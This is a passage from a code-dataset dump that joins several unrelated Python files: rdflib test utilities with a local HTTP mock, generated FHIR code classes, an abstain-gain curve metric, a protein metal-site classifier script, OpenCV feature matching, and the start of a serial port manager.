This asserts that the two graphs are isomorphic, providing a nicely
formatted error message if they are not.
"""
def format_report(message: Optional[str] = None) -> str:
in_both, in_lhs, in_rhs = rdflib.compare.graph_diff(lhs, rhs)
preamle = "" if message is None else f"{message}\n"
return (
f"{preamle}in both:\n"
f"{cls.format_graph_set(in_both)}"
"\nonly in first:\n"
f"{cls.format_graph_set(in_lhs, sort = True)}"
"\nonly in second:\n"
f"{cls.format_graph_set(in_rhs, sort = True)}"
)
assert rdflib.compare.isomorphic(lhs, rhs), format_report(message)
@classmethod
def strip_literal_datatypes(cls, graph: Graph, datatypes: Set[URIRef]) -> None:
"""
Strips datatypes in the provided set from literals in the graph.
"""
for object in graph.objects():
if not isinstance(object, Literal):
continue
if object.datatype is None:
continue
if object.datatype in datatypes:
object._datatype = None
GenericT = TypeVar("GenericT", bound=Any)
def make_spypair(method: GenericT) -> Tuple[GenericT, Mock]:
m = MagicMock()
def wrapper(self: Any, *args: Any, **kwargs: Any) -> Any:
m(*args, **kwargs)
return method(self, *args, **kwargs)
setattr(wrapper, "mock", m)
return cast(GenericT, wrapper), m
HeadersT = Dict[str, List[str]]
PathQueryT = Dict[str, List[str]]
class MockHTTPRequests(NamedTuple):
method: str
path: str
parsed_path: ParseResult
path_query: PathQueryT
headers: email.message.Message
class MockHTTPResponse(NamedTuple):
status_code: int
reason_phrase: str
body: bytes
headers: HeadersT
class SimpleHTTPMock:
"""
SimpleHTTPMock allows testing of code that relies on an HTTP server.
NOTE: Currently only the GET and POST methods is supported.
Objects of this class has a list of responses for each method (GET, POST, etc...)
and returns these responses for these methods in sequence.
All request received are appended to a method specific list.
Example usage:
>>> httpmock = SimpleHTTPMock()
>>> with ctx_http_server(httpmock.Handler) as server:
... url = "http://{}:{}".format(*server.server_address)
... # add a response the server should give:
... httpmock.do_get_responses.append(
... MockHTTPResponse(404, "Not Found", b"gone away", {})
... )
...
... # send a request to get the first response
... http_error: Optional[HTTPError] = None
... try:
... urlopen(f"{url}/bad/path")
... except HTTPError as caught:
... http_error = caught
...
... assert http_error is not None
... assert http_error.code == 404
...
... # get and validate request that the mock received
... req = httpmock.do_get_requests.pop(0)
... assert req.path == "/bad/path"
"""
# TODO: add additional methods (PUT, PATCH, ...) similar to GET and POST
def __init__(self):
self.do_get_requests: List[MockHTTPRequests] = []
self.do_get_responses: List[MockHTTPResponse] = []
self.do_post_requests: List[MockHTTPRequests] = []
self.do_post_responses: List[MockHTTPResponse] = []
_http_mock = self
class Handler(SimpleHTTPRequestHandler):
http_mock = _http_mock
def _do_GET(self):
parsed_path = urlparse(self.path)
path_query = parse_qs(parsed_path.query)
request = MockHTTPRequests(
"GET", self.path, parsed_path, path_query, self.headers
)
self.http_mock.do_get_requests.append(request)
response = self.http_mock.do_get_responses.pop(0)
self.send_response(response.status_code, response.reason_phrase)
for header, values in response.headers.items():
for value in values:
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.body)
self.wfile.flush()
return
(do_GET, do_GET_mock) = make_spypair(_do_GET)
def _do_POST(self):
parsed_path = urlparse(self.path)
path_query = parse_qs(parsed_path.query)
request = MockHTTPRequests(
"POST", self.path, parsed_path, path_query, self.headers
)
self.http_mock.do_post_requests.append(request)
response = self.http_mock.do_post_responses.pop(0)
self.send_response(response.status_code, response.reason_phrase)
for header, values in response.headers.items():
for value in values:
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.body)
self.wfile.flush()
return
(do_POST, do_POST_mock) = make_spypair(_do_POST)
def log_message(self, format: str, *args: Any) -> None:
pass
self.Handler = Handler
self.do_get_mock = Handler.do_GET_mock
self.do_post_mock = Handler.do_POST_mock
def reset(self):
self.do_get_requests.clear()
self.do_get_responses.clear()
self.do_get_mock.reset_mock()
self.do_post_requests.clear()
self.do_post_responses.clear()
self.do_post_mock.reset_mock()
@property
def call_count(self):
return self.do_post_mock.call_count + self.do_get_mock.call_count
class SimpleHTTPMockTests(unittest.TestCase):
def test_example(self) -> None:
httpmock = SimpleHTTPMock()
with ctx_http_server(httpmock.Handler) as server:
url = "http://{}:{}".format(*server.server_address)
# add two responses the server should give:
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
# send a request to get the first response
with self.assertRaises(HTTPError) as raised:
urlopen(f"{url}/bad/path")
assert raised.exception.code == 404
# get and validate request that the mock received
req = httpmock.do_get_requests.pop(0)
self.assertEqual(req.path, "/bad/path")
# send a request to get the second response
resp = urlopen(f"{url}/")
self.assertEqual(resp.status, 200)
self.assertEqual(resp.read(), b"here it is")
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
class ServedSimpleHTTPMock(SimpleHTTPMock, AbstractContextManager):
"""
ServedSimpleHTTPMock is a ServedSimpleHTTPMock with a HTTP server.
Example usage:
>>> with ServedSimpleHTTPMock() as httpmock:
... # add a response the server should give:
... httpmock.do_get_responses.append(
... MockHTTPResponse(404, "Not Found", b"gone away", {})
... )
...
... # send a request to get the first response
... http_error: Optional[HTTPError] = None
... try:
... urlopen(f"{httpmock.url}/bad/path")
... except HTTPError as caught:
... http_error = caught
...
... assert http_error is not None
... assert http_error.code == 404
...
... # get and validate request that the mock received
... req = httpmock.do_get_requests.pop(0)
... assert req.path == "/bad/path"
"""
def __init__(self, host: str = "127.0.0.1"):
super().__init__()
self.server = HTTPServer((host, 0), self.Handler)
self.server_thread = Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self) -> None:
self.server.shutdown()
self.server.socket.close()
self.server_thread.join()
@property
def address_string(self) -> str:
(host, port) = self.server.server_address
return f"{host}:{port}"
@property
def url(self) -> str:
return f"http://{self.address_string}"
def __enter__(self) -> "ServedSimpleHTTPMock":
return self
def __exit__(
self,
__exc_type: Optional[Type[BaseException]],
__exc_value: Optional[BaseException],
__traceback: Optional[TracebackType],
) -> "te.Literal[False]":
self.stop()
return False
class ServedSimpleHTTPMockTests(unittest.TestCase):
def test_example(self) -> None:
with ServedSimpleHTTPMock() as httpmock:
# add two responses the server should give:
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
# send a request to get the first response
with self.assertRaises(HTTPError) as raised:
urlopen(f"{httpmock.url}/bad/path")
assert raised.exception.code == 404
# get and validate request that the mock received
req = httpmock.do_get_requests.pop(0)
self.assertEqual(req.path, "/bad/path")
# send a request to get the second response
resp = urlopen(f"{httpmock.url}/")
self.assertEqual(resp.status, 200)
self.assertEqual(resp.read(), b"here it is")
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
def eq_(lhs, rhs, msg=None):
"""
This function mimicks the similar function from nosetest. Ideally nothing
should use it but there is a lot of code that still does and it's fairly
simple to just keep this small pollyfill here for now.
"""
if msg:
assert lhs == rhs, msg
else:
assert lhs == rhs
PurePathT = TypeVar("PurePathT", bound=PurePath)
def file_uri_to_path(
file_uri: str,
path_class: Type[PurePathT] = PurePath, # type: ignore[assignment]
url2pathname: Optional[Callable[[str], str]] = None,
) -> PurePathT:
"""
This function returns a pathlib.PurePath object for the supplied file URI.
:param str file_uri: The file URI ...
:param class path_class: The type of path in the file_uri. By default it uses
the system specific path pathlib.PurePath, to force a specific type of path
pass pathlib.PureWindowsPath or pathlib.PurePosixPath
:returns: the pathlib.PurePath object
:rtype: pathlib.PurePath
"""
is_windows_path = isinstance(path_class(), PureWindowsPath)
file_uri_parsed = urlparse(file_uri)
if url2pathname is None:
if is_windows_path:
url2pathname = nt_url2pathname
else:
url2pathname = unquote
pathname = url2pathname(file_uri_parsed.path)
result = path_class(pathname)
return result
ParamsT = TypeVar("ParamsT", bound=tuple)
Marks = Collection[Union[Mark, MarkDecorator]]
def pytest_mark_filter(
param_sets: Iterable[Union[ParamsT, ParameterSet]], mark_dict: Dict[ParamsT, Marks]
) -> Generator[ParameterSet, None, None]:
"""
Adds marks to test parameters. Useful for adding xfails to test parameters.
"""
for param_set in param_sets:
if isinstance(param_set, ParameterSet):
# param_set.marks = [*param_set.marks, *marks.get(param_set.values, ())]
yield pytest.param(
*param_set.values,
id=param_set.id,
marks=[
*param_set.marks,
*mark_dict.get(cast(ParamsT, param_set.values), cast(Marks, ())),
],
)
else:
yield pytest.param(
*param_set, marks=mark_dict.get(param_set, cast(Marks, ()))
)
| StarcoderdataPython |
1721502 | from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class CatalogEntryRelationTypeCode(GenericTypeCode):
"""
CatalogEntryRelationType
From: http://hl7.org/fhir/relation-type in valuesets.xml
The type of relations between entries.
"""
def __init__(self, value: AutoMapperTextInputType):
super().__init__(value=value)
"""
http://hl7.org/fhir/relation-type
"""
codeset: FhirUri = "http://hl7.org/fhir/relation-type"
class CatalogEntryRelationTypeCodeValues:
"""
the related entry represents an activity that may be triggered by the current
item.
From: http://hl7.org/fhir/relation-type in valuesets.xml
"""
Triggers = CatalogEntryRelationTypeCode("triggers")
"""
the related entry represents an item that replaces the current retired item.
From: http://hl7.org/fhir/relation-type in valuesets.xml
"""
ReplacedBy = CatalogEntryRelationTypeCode("is-replaced-by")
| StarcoderdataPython |
3229667 | <reponame>perellonieto/background_check
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import auc
import warnings
class AbstainGainCurve:
"""This class represents an Abstain-gain (AG) curve. An object of class
AbstainGainCurve is built based on the result of two models:
1- The first one is a training data vs reject data classifier and its
recall and precision values at various thresholds are used to build
the curve;
2- The second (binary) classifier was trained to separate both classes of
the original training data. Its gain values for all recall values of
the first classifier are multiplied by the corresponding precision
values and used to build the curve.
Args:
step1_reject_scores ([float]): Positive scores for the reject data,
obtained from the training data vs reject data classifier. For
each threshold value "theta", the classifier accepts an instance
"x" when "S_1(x) >= theta", where "S_1(x)" is the score given by
the first classifier to instance "x".
step1_training_scores ([float]): Positive scores for the training
data, obtained from the training data vs reject data classifier.
For each threshold value "theta", the classifier accepts an
instance "x" when "S_1(x) >= theta", where "S_1(x)" is the score
given by the first classifier to instance "x".
step2_training_scores ([int]): Positive scores for the training data,
obtained from the second classifier. For each threshold value
"theta", the classifier labels an instance "x" as positive when
"S_1(x) >= theta", where "S_1(x)" is the score given by the
second classifier to instance "x".
training_labels ([int]): Labels of the training data. 1 for the
positive class and 0 for the negative class.
gain (str): Which type of gain is used to evaluate the second
classifier.
step2_threshold (float): Threshold used to calculate the gain of the
second classifier.
Attributes:
thresholds ([float]): Thresholds corresponding to the recall and
precision values.
recalls ([float]): Recalls of the first classifier, calculated by
thresholding over step1_reject_scores and step1_training_scores.
precisions ([float]): Precisions of the first classifier, calculated
by thresholding over step1_reject_scores and step1_training_scores.
gains ([float]): Gain values of the second classifier, calculated
using the true training instances accepted by the first
classifier at the various recall thresholds.
gain_type (str): Which type of gain is used to evaluate the second
classifier.
positive_proportion (float): the proportion of positives (true
training data) scored by the first classifier.
"""
def __init__(self, step1_reject_scores, step1_training_scores,
step2_training_scores,
training_labels, gain="accuracy", step2_threshold=0.5):
pos_scores = np.append(np.inf, np.unique(np.append(
step1_training_scores, step1_reject_scores))[::-1])
self.thresholds = np.ones(np.alen(pos_scores)) * -1.0
self.recalls = np.zeros(np.alen(pos_scores))
self.precisions = np.zeros(np.alen(pos_scores))
self.gains = np.zeros(np.alen(pos_scores))
self.gain_type = gain
self.positive_proportion = np.alen(step1_training_scores) / (np.alen(
step1_training_scores) + np.alen(step1_reject_scores))
self.mod_gains_ag = np.zeros(np.alen(pos_scores))
self.recalls_ag = np.zeros(np.alen(pos_scores))
all_accepted_training = np.zeros((np.alen(pos_scores), np.alen(
training_labels)))
g = calculate_gain(step2_training_scores, training_labels, gain=gain,
threshold=step2_threshold)
for i, threshold in enumerate(pos_scores):
n_accepted_rejects = np.sum(step1_reject_scores >= threshold)
accepted_training = step1_training_scores >= threshold
new_recall = np.sum(accepted_training) / np.alen(training_labels)
if i == 0 or new_recall != self.recalls[i-1]:
self.thresholds[i] = threshold
self.recalls[i] = new_recall
all_accepted_training[i] = accepted_training
if (np.sum(accepted_training) + n_accepted_rejects) == 0.0:
self.precisions[i] = np.nan
else:
self.precisions[i] = np.sum(accepted_training) / (
np.sum(accepted_training) + n_accepted_rejects)
accepted_scores = step2_training_scores[accepted_training]
accepted_labels = training_labels[accepted_training]
self.gains[i] = calculate_gain(accepted_scores, accepted_labels,
gain=gain,
threshold=step2_threshold)
denominator = (1.0 - g * self.positive_proportion)
self.mod_gains_ag[i] = (self.gains[i]*self.precisions[i] -
g*self.positive_proportion) / denominator
self.recalls_ag[i] = (self.recalls[i] -
g*self.positive_proportion) / denominator
self.recalls = self.recalls[self.thresholds > -1.0]
self.gains = self.gains[self.thresholds > -1.0]
self.precisions = self.precisions[self.thresholds > -1.0]
self.mod_gains_ag = self.mod_gains_ag[self.thresholds > -1.0]
self.recalls_ag = self.recalls_ag[self.thresholds > -1.0]
all_accepted_training = all_accepted_training[self.thresholds > -1.0]
self.thresholds = self.thresholds[self.thresholds > -1.0]
[self.recalls_ag, self.mod_gains_ag] = generate_crossing_points(
all_accepted_training.astype(bool),
step1_reject_scores, step1_training_scores,
step2_training_scores,
training_labels, self.recalls_ag,
self.mod_gains_ag,
g * self.positive_proportion,
gain=self.gain_type,
threshold=step2_threshold)
self.mod_gains_ag = self.mod_gains_ag[self.recalls_ag >= 0]
self.recalls_ag = self.recalls_ag[self.recalls_ag >= 0]
def plot(self, fig=None, baseline=True):
"""This method plots the RGP surface, with the recalls from the
first classifier on the x-axis and the gains of the second classifier,
multiplied by the corresponding precisions from the first classifier
on the y-axis. The optimal threshold of the first classifier is shown
in two ways:
1- Black circle marks the optimal according to f-beta.
2- Red dot marks the optimal according to optimization criterion.
Args:
fig (object): An object of a Matplotlib figure
(as obtained by using Matplotlib's figure() function).
baseline (bool): True means that the baseline will be drawn.
The baseline is built by taking the worst precision
(proportion of positives) for every recall value.
Returns:
Nothing.
"""
# Ignore warnings from matplotlib
warnings.filterwarnings("ignore")
if fig is None:
fig = plt.figure()
plt.plot(self.recalls_ag, self.mod_gains_ag, 'k.-')
plt.xlabel("$\mathrm{Recall}_1-AG$")
plt.ylabel("$\mathrm{Accuracy'}_2-AG$")
axes = plt.gca()
axes.set_xlim([0.0, 1.01])
axes.set_ylim([0.0, 1.0])
axes.spines['top'].set_visible(False)
axes.spines['right'].set_visible(False)
axes.get_xaxis().tick_bottom()
axes.get_yaxis().tick_left()
plt.show()
def calculate_area(self):
"""This method calculates the area under the RGP curve,
by invoking Scikit Learn's auc function, which calculates
the area using the trapezoid rule.
Args:
None.
Returns:
float: The volume under the Recall-gain-ROC-Precision-gain surface.
"""
return auc(self.recalls_ag, self.mod_gains_ag, reorder=True)
def calculate_gain(accepted_scores, accepted_labels, gain="accuracy",
threshold=0.5):
"""This function calculates the gain of the second classifier, based on the
true training instances accepted by the first classifier.
Args:
accepted_scores ([int]): Positive scores obtained from
the second classifier for the true training data
accepted by the first classifier. For each threshold value
"theta", the second classifier labels an instance "x" as
positive when "S_1(x) >= theta", where "S_1(x)" is the score
given by the second classifier to instance "x".
accepted_labels ([int]): Labels of the true training data
accepted by the first classifier. 1 for the positive class
and 0 for the negative class.
gain (str): Which type of gain is used to evaluate the second
classifier.
threshold (float): Threshold used to calculate the gain of the
second classifier.
Returns:
float: The gain of the second classifier, based on the true
training instances accepted by the first classifier.
"""
if gain == "accuracy":
if np.alen(accepted_labels) == 0:
return np.nan
else:
n_correct_instances = np.sum(np.logical_not(
np.logical_xor(accepted_scores >= threshold,
accepted_labels == 1)))
return n_correct_instances / np.alen(accepted_labels)
def generate_crossing_points(all_accepted_training, step1_reject_scores,
step1_training_scores, step2_training_scores,
training_labels,
recalls_ag, mod_gains_ag,
baseline, gain="accuracy", threshold=0.5):
non_negative_indices = np.where(recalls_ag >= 0)[0]
j = np.amin(non_negative_indices)
if recalls_ag[j] > 0:
rag = recalls_ag[j]
true_positives = all_accepted_training[j]
while rag > 0:
min_accepted_score = np.amin(step1_training_scores[true_positives])
index = np.random.choice(np.where(step1_training_scores ==
min_accepted_score)[0], 1)
true_positives[index] = False
new_recall = np.sum(true_positives) / np.alen(training_labels)
rag = (new_recall - baseline) / (1.0 - baseline)
accepted_rejects = step1_reject_scores >= min_accepted_score
new_precision = np.sum(true_positives) / (
np.sum(true_positives) + np.sum(accepted_rejects))
new_gain = calculate_gain(step2_training_scores[true_positives],
training_labels[true_positives],
gain=gain,
threshold=threshold)
new_mod_gain_ag = (new_gain * new_precision - baseline) / (1 - baseline)
recalls_ag = np.insert(recalls_ag, j, 0)
mod_gains_ag = np.insert(mod_gains_ag, j, new_mod_gain_ag)
# Add final point in the right-hand side of the curve
min_mod_gain_ag = np.amin(mod_gains_ag[non_negative_indices])
if min_mod_gain_ag > 0:
recalls_ag = np.append(recalls_ag, 1)
mod_gains_ag = np.append(mod_gains_ag, 0)
return [recalls_ag, mod_gains_ag]
| StarcoderdataPython |
3327477 | <filename>ClassifyAllSites.py
import sys
import torch
import matplotlib.pyplot as plt
#from metalsiteprediction.ConvRecurrent.utils import getTestLoader, get_model
#from metalsiteprediction.ConvRecurrent.utils import getIronLoader, iron_path
#from metalsiteprediction.ConvRecurrent.trainer import predict, estimate
#from metalsiteprediction.ConvRecurrent.utils import readSitePickle
from utils import getTestLoader, get_model
from utils import getIronLoader, iron_path
from predict import predict, estimate
from utils import readSitePickle
import argparse
from datetime import datetime
import copy
import pandas as pd
import math
import pathlib
now = datetime.now().strftime("%Y%m%d%_H%M%S")
parser = argparse.ArgumentParser(description="Automatic peaks assignement tool")
# CUDA for PyTorch
use_cuda = torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
#device = "cpu"
torch.backends.cudnn.benchmark = True
parser.add_argument(
"--metal",
choices=['iron', 'zinc'],
help="The metal data to classify",
required=True)
def run_zinc_classification():
OUTPUT = []
LABELS = []
SITE_NAMES = []
accs = []
for f_idx in range(10):
print(f"FOLD {f_idx}", "=="*30)
model = get_model(f_idx) # torch.load(os.path.join(models_dir, f"F{f_idx}_R0"), map_location=device)
loader = getTestLoader(f_idx)
output, labels, site_names = estimate(model, loader)
acc = (output.argmax(dim=1) == labels).float().mean()
accs.append(acc)
print("Fold acc: ", acc)
print(output.size())
print(labels.size())
OUTPUT.append(output)
LABELS.append(labels)
SITE_NAMES += site_names
OUTPUT = torch.cat(OUTPUT, dim=0)
LABELS = torch.cat(LABELS, dim=0)
print(SITE_NAMES)
print(len(SITE_NAMES))
print(OUTPUT.size())
print(LABELS.size())
acc_mean = sum(accs) / len(accs)
ACC = (OUTPUT.argmax(dim=1) == LABELS).float().mean()
print("Mean acc: ", acc_mean, ACC)
classifications = pd.DataFrame({'site':SITE_NAMES,
'P(0)':OUTPUT[:,0],
'P(1)':OUTPUT[:,1],
'LABEL': LABELS})
classifications.to_csv(f"Zinc_Classifications{now}.csv", index=False)
def run_iron_classification():
# dato che ho dieci modelli... faccio la media dei 10... ???
d = pathlib.Path("mapping_iron.csv")
mapping_df = pd.read_csv(d)
mapping_df = mapping_df.set_index('OldName')
print(mapping_df)
ironLoader = getIronLoader(batch_size=32)
classifications_df = None
print("= ="*20)
print("= =" * 20)
acc0s = []
acc1s = []
# dovremmo mediare su tutti i fold
for f_idx in range(1):
print(f"FOLD {f_idx} Model", "=="*50)
zincTrainedModel = get_model(f_idx)
# fare la media delle classificazioni... fare una funzion che lo fa
# e metterla da qualche parte, riservirà
print("Estimating...")
output, labels, site_names = estimate(zincTrainedModel, ironLoader)
N_iones = []
Site_len = []
for site in site_names:
rowsite = readSitePickle(iron_path.joinpath(site+".pkl"), to_transform=False)
involved_iones = mapping_df.loc[site, 'Sites'].split(';')
N_iones.append(len(involved_iones))
Site_len.append(len(rowsite['fasta']))
print(site, " --> ", mapping_df.loc[site, 'Sites'], len(involved_iones))
#if classifications_df != None:
classifications = pd.DataFrame({'site': site_names,
'P(0)': output[:, 0],
'P(1)': output[:, 1],
'#iones':N_iones,
'Len':Site_len,
'LABEL': labels})
#print(classifications)
accuracy = (output.argmax(dim=1) == labels).float().mean()
C0_idxs = labels == 0
C1_idxs = labels == 1
print(len(C0_idxs.nonzero()), C0_idxs.sum())
print(len(C1_idxs.nonzero()), C1_idxs.sum())
print("Acc: ", accuracy)
accuracy0 = ( output[C0_idxs].argmax(dim=1) == labels[C0_idxs]).float().mean()
accuracy1 = (output[C1_idxs].argmax(dim=1) == labels[C1_idxs]).float().mean()
print(f"#C0 {C0_idxs.sum()}, #C1 {C1_idxs.sum()}")
print("ACC0", accuracy0, "ACC1", accuracy1)
acc0s.append(accuracy0)
acc1s.append(accuracy1)
print(classifications)
print(acc0s)
print(acc1s)
print("AVGs Results:")
print(sum(acc0s)/len(acc0s))
print(sum(acc1s) / len(acc1s))
classifications.to_csv(f"Iron_Classifications{now}.csv", index=False)
classifications1 = classifications[classifications['#iones'] == 1]
classificationsL1 = classifications1[classifications1['LABEL'] == 1]
output = classificationsL1[['P(0)', 'P(1)']].to_numpy()
labels = classificationsL1['LABEL'].to_numpy()
#print(output)
#print(labels)
accuracyL1 = (output.argmax(axis=1) == labels).mean()
print(accuracyL1)
classificationsL0 = classifications1[classifications1['LABEL'] == 0]
output = classificationsL0[['P(0)', 'P(1)']].to_numpy()
labels = classificationsL0['LABEL'].to_numpy()
#print(output)
#print(labels)
accuracyL0 = (output.argmax(axis=1) == labels).mean()
print(accuracyL0)
return classifications
#run_zinc_classification()
#run_iron_classification()
if __name__ == '__main__':
args = parser.parse_args()
print(args)
if args.metal == 'zinc':
print("Running zinc data classification")
run_zinc_classification()
else:
print("Running iron data classification")
run_iron_classification()
| StarcoderdataPython |
73242 | #!/usr/bin/env python
import numpy as np
import cv2
def findCenterOfTarget(dst):
return np.mean(dst, axis=0)
# def kaze_match(im1_path, im2_path):
def kaze_match(img1, img2):
if img1.shape[2] == 1:
gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
else:
gray1 = img1
gray2 = img2
# initialize the AKAZE descriptor, then detect keypoints and extract
# local invariant descriptors from the image
detector = cv2.AKAZE_create()
(kp1, descs1) = detector.detectAndCompute(gray1, None)
(kp2, descs2) = detector.detectAndCompute(gray2, None)
print("keypoints: {}, descriptors: {}".format(len(kp1), descs1.shape))
print("keypoints: {}, descriptors: {}".format(len(kp2), descs2.shape))
# Match the features
bf = cv2.BFMatcher(cv2.NORM_HAMMING)
matches = bf.knnMatch(descs1,descs2, k=2) # typo fixed
# Apply ratio test
good = []
for m,n in matches:
if m.distance < 0.9*n.distance:
good.append(m)
MIN_MATCH_COUNT = 5
if len(good)>MIN_MATCH_COUNT:
src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h,w = gray1.shape
pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
dst = cv2.perspectiveTransform(pts,M)
# Find the center and draw the it
center = findCenterOfTarget(dst)
img2 = cv2.circle(img2,(center[0][0], center[0][1]),10, (255,0,0), -1)
img2 = cv2.polylines(img2,[np.int32(dst)],True,255,3, cv2.LINE_AA)
else:
print ("Not enough matches are found - %d/%d" % (len(good),MIN_MATCH_COUNT))
matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
singlePointColor = None,
matchesMask = matchesMask, # draw only inliers
flags = 2)
# cv2.drawMatchesKnn expects list of lists as matches.
img3 = cv2.drawMatches(img1,kp1,img2,kp2,good,None)
cv2.imshow("AKAZE matching", img3)
cv2.waitKey(10)
return img3
def FLANNBasedMatcher(img1,img2):
if img1.shape[2] == 1:
gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
else:
gray1 = img1
gray2 = img2
# Initiate SIFT detector
sift = cv2.xfeatures2d.SIFT_create()
# find the keypoints and descriptors with SIFT
kp1, des1 = sift.detectAndCompute(img1,None)
kp2, des2 = sift.detectAndCompute(img2,None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
search_params = dict(checks = 50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1,des2,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
if m.distance < 0.7*n.distance:
good.append(m)
MIN_MATCH_COUNT = 5
if len(good)>MIN_MATCH_COUNT:
src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h,w = gray1.shape
pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
dst = cv2.perspectiveTransform(pts,M)
# Find the center and draw the it
center = findCenterOfTarget(dst)
img2 = cv2.circle(img2,(center[0][0], center[0][1]),10, (255,0,0), -1)
img2 = cv2.polylines(img2,[np.int32(dst)],True,255,3, cv2.LINE_AA)
else:
print "Not enough matches are found - %d/%d" % (len(good),MIN_MATCH_COUNT)
matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
singlePointColor = None,
matchesMask = matchesMask, # draw only inliers
flags = 2)
img3 = cv2.drawMatches(img1,kp1,img2,kp2,good,None,**draw_params)
cv2.imshow("FLANNBasedMatcher", img3)
cv2.waitKey(10)
return img3
def BruteForceMatchingwithSIFTDescriptorsandRatioTest(img1,img2):
center = None
gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
# Initiate SIFT detector
sift = cv2.xfeatures2d.SIFT_create()
# find the keypoints and descriptors with SIFT
kp1, des1 = sift.detectAndCompute(gray1,None)
kp2, des2 = sift.detectAndCompute(gray2,None)
# BFMatcher with default params
bf = cv2.BFMatcher()
matches = bf.knnMatch(des1,des2, k=2)
# Apply ratio test
good = []
for m,n in matches:
if m.distance < 0.75*n.distance:
good.append(m)
MIN_MATCH_COUNT = 10
if len(good)>MIN_MATCH_COUNT:
src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
# center = np.mean(dst_pts, axis=0)
# print center[0]
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h,w = gray1.shape
pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
dst = cv2.perspectiveTransform(pts,M)
center = findCenterOfTarget(dst)
img2 = cv2.circle(img2,(center[0][0], center[0][1]),10, (255,0,0), -1)
img2 = cv2.polylines(img2,[np.int32(dst)],True,255,3, cv2.LINE_AA)
else:
print "Not enough matches are found - %d/%d" % (len(good),MIN_MATCH_COUNT)
matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
singlePointColor = None,
matchesMask = matchesMask, # draw only inliers
flags = 2)
# cv2.drawMatchesKnn expects list of lists as matches.
# img3 = cv2.drawMatchesKnn(img1,kp1,img2,kp2,good,None)
img3 = cv2.drawMatches(img1,kp1,img2,kp2,good,None,**draw_params)
cv2.imshow("Brute Force Matching", img3)
cv2.waitKey(3)
return img3, center
cap = cv2.VideoCapture(0)
state = False
template = None
while(True):
ret, frame = cap.read()
if template is None and state:
r = cv2.selectROI('Frame', frame)
template = frame[int(r[1]):int(r[1]+r[3]), int(r[0]):int(r[0]+r[2])]
state = False
if template is not None:
# frame = kaze_match(template, frame)
# frame = FLANNBasedMatcher(template, frame)
frame = BruteForceMatchingwithSIFTDescriptorsandRatioTest(template, frame)
cv2.imshow('Frame', frame)
ikey = cv2.waitKey(10)
if ikey == ord('q'):
break
elif ikey == ord('n'):
template = None
state = True
| StarcoderdataPython |
101667 | <reponame>pixelfelon/binho-python-package
import os
import enum
import threading
import queue
import signal
import sys
import serial
SERIAL_TIMEOUT = 0.5
class SerialPortManager(threading.Thread):
serialPort = None
txdQueue = None
rxdQueue = None
intQueue = None
stopper = None
inBridgeMode = False
def __init__(self, serialPort, txdQueue, rxdQueue, intQueue, stopper): # pylint: disable=too-many-arguments
super().__init__()
self.serialPort = serialPort
self.txdQueue = txdQueue
self.rxdQueue = rxdQueue
self.intQueue = intQueue
self.stopper = stopper
self.exception = None
self.daemon = True
def run(self):
try:
comport = serial.Serial(self.serialPort, baudrate=1000000, timeout=0.025, write_timeout=0.05)
except BaseException:
self.stopper.set()
while not self.stopper.is_set(): # pylint: disable=too-many-nested-blocks
try:
if self.inBridgeMode:
if comport.in_waiting > 0:
receivedData = comport.read().decode("utf-8")
self.rxdQueue.put(receivedData)
if not self.txdQueue.empty():
serialData = self.txdQueue.get()
comport.write(serialData.encode("utf-8"))
else:
if comport.in_waiting > 0:
